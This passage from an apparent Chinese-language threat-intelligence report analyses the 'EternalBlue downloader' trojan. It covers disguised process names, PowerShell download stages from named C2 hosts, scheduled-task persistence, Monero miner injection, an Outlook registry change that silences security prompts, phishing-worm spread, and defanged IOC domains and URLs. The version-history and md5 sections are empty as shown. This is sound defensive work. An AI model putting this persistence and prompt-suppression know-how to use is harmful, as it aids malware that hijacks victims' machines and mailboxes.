“conhoste”,“Setring”,“Galligrp”,“Imaging”,“taskegr”,“Terms.EXE”,“360”,“8866”,“9966”,“9696”,“9797”,“svchosti”,“SearchIndex”,“Avira”,“cohernece”,“win”,“SQLforwin”,“xig*”,“taskmgr1”,“Workstation”,“ress”,“explores”` 5.执行Payload 通过爆破、RCE漏洞攻击、钓鱼邮件攻击后会下载和执行Powershell代码： http[:]//t.amynx.com/mail.jsp或http[:]//t.amynx.com/usb.jsp mail.jsp更新C2地址为：t.amynx.com、t.zer9g.com、t.zz3r0.com，并且安装计划任务blackball（“黑球”），该计划任务无实际代码执行。 然后mail.jsp安装三个随机名计划任务（分别为<random>、<random>\<random>、MicroSoft\Windows\<random>），执行命令为“PS_CMD”。之后三个计划任务中的命令“PS_CMD”被替换为下载和执行Powershell代码http[:]//t.awcna.com/a.jsp、http[:]//t.zer9g.com/a.jsp、http[:]//t.zz3r0.com /a.jsp以达到持久化攻击。 a.jsp负责下载攻击模块if.bin执行漏洞利用和弱口令爆破功能。下载门罗币挖矿模块m6.bin、m6g.bin，并通过Invoke-ReflectivePEInjection将XMR挖矿木马注入Powershell.exe运行，连接矿池lplp.ackng.com:443挖矿，导致CPU占用率接近100%。 将OutLook注册表 “*\Outlook\Security”下的ObjectModelGuard值设为2，即不对outlook任何可疑活动进行提示。 然后下载和执行Powershell版邮件蠕虫攻击程序http[:]//d.ackng.com/if_mail.bin，获取邮箱所有联系人，依次发送钓鱼邮件，进入下一轮攻击流程。 6.历次版本修改 根据腾讯安全威胁情报中心持续跟踪结果，永恒之蓝下载器木马在2018~2020间，已升级十余次，历次变化情况如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com   URL： http[:]//d.ackng.com/if_mail.bin http[:]//d.ackng.com/if.bin http[:]//t.zer9g.com/a.jsp http[:]//t.zz3r0.com/a.jsp http[:]//t.amynx.com/mail.jsp   md5 参考链接： https://mp.weixin.qq.com/s/bibSEjfLnuOA9vyEMHkv9Q https://mp.weixin.qq.com/s/LDWRacyVMAu2JGZUJf3qKQ